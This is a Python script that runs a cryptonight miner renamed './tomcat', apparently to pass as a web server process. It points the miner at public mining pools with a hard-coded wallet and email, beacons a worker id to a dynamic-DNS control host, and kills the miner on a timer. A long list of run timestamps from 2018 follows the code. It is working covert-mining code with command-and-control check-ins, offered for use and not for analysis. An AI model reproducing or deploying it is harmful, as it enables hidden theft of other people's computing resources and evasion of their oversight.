import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:21:01.534741
#2018-02-17 16:07:06.039277
#2018-02-17 17:54:01.535395
#2018-02-17 19:41:04.486539
#2018-02-17 21:29:06.824516
#2018-02-17 23:13:03.691464
#2018-02-18 01:00:01.900687
#2018-02-18 02:49:06.740750
#2018-02-18 04:38:03.871932
#2018-02-18 06:29:03.773040
#2018-02-18 08:18:04.043385
#2018-02-18 10:06:07.700311
#2018-02-18 11:52:03.572799
#2018-02-18 13:38:04.867314
#2018-02-18 15:28:05.453017
#2018-02-18 17:17:03.956732
#2018-02-18 19:06:05.872443
#2018-02-18 20:52:01.646576
#2018-02-18 22:39:03.628418
#2018-02-19 00:28:04.837958
#2018-02-19 02:12:03.651578
#2018-02-19 03:59:05.229212
#2018-02-19 05:44:06.375047
#2018-02-19 07:33:01.423316
#2018-02-19 09:23:03.604587
#2018-02-19 11:12:04.692188
#2018-02-19 12:59:05.096856
#2018-02-19 14:46:09.820924
#2018-02-19 16:36:09.981806
#2018-02-19 18:22:07.404150
#2018-02-19 20:09:07.652459
#2018-02-19 22:00:10.827019
#2018-02-19 23:47:06.247555
#2018-02-20 01:34:06.765078
#2018-02-20 03:22:08.349576
#2018-02-20 05:08:05.537656
#2018-02-20 06:50:02.108104
#2018-02-20 08:37:04.920494
#2018-02-20 10:21:06.178059
#2018-02-20 12:07:02.051423
#2018-02-20 13:54:01.958842
#2018-02-20 15:38:05.468770
#2018-02-20 17:24:14.106186
#2018-02-20 19:14:06.616158
#2018-02-20 21:03:04.176696
#2018-02-20 22:48:05.807102
#2018-02-21 00:32:01.603942
#2018-02-21 02:17:01.828040
#2018-02-21 04:04:06.237756
#2018-02-21 05:51:06.976525
#2018-02-21 07:40:08.455212
#2018-02-21 09:43:04.969357
#2018-02-21 11:32:06.705712
#2018-02-21 13:23:02.168315
#2018-02-21 15:08:05.598507
#2018-02-21 16:59:13.918954
#2018-02-21 18:49:05.556217
#2018-02-21 20:36:01.517197
#2018-02-21 22:21:01.512244
#2018-02-22 00:11:06.359524
#2018-02-22 02:02:05.333099
#2018-02-22 03:48:07.397601
#2018-02-22 05:35:08.671538
#2018-02-22 07:20:09.575182
#2018-02-22 09:08:07.564827
#2018-02-22 10:56:06.350487
#2018-02-22 12:43:04.603154
#2018-02-22 14:29:03.125068
#2018-02-22 16:16:11.520378
#2018-02-22 18:03:08.797040
#2018-02-22 19:53:11.256423
#2018-02-22 21:42:07.386658
#2018-02-22 23:29:05.405856
#2018-02-23 01:17:06.822652
#2018-02-23 03:03:07.407349
#2018-02-23 04:51:06.773928
#2018-02-23 06:36:06.202448
#2018-02-23 08:24:07.580259
#2018-02-23 10:40:04.136877
#2018-02-23 12:37:07.340374
#2018-02-23 14:22:04.392260
#2018-02-23 16:13:05.724442
#2018-02-23 17:59:07.099791
#2018-02-23 19:45:08.878805
#2018-02-23 21:28:06.317472
#2018-02-23 23:16:06.928243
#2018-02-24 01:06:05.407438
#2018-02-24 02:58:01.715639
#2018-02-24 06:13:04.962800
#2018-02-24 08:01:06.390267
#2018-02-24 09:45:03.254582
#2018-02-24 11:39:04.259828
#2018-02-24 13:29:06.555390
#2018-02-24 15:18:03.927547
#2018-02-24 17:07:01.908015
#2018-02-24 18:58:06.904436
#2018-02-24 20:47:04.308665
#2018-02-24 23:03:05.405780
#2018-02-25 02:20:05.812123
#2018-02-25 05:39:06.493105
#2018-02-25 11:35:08.352437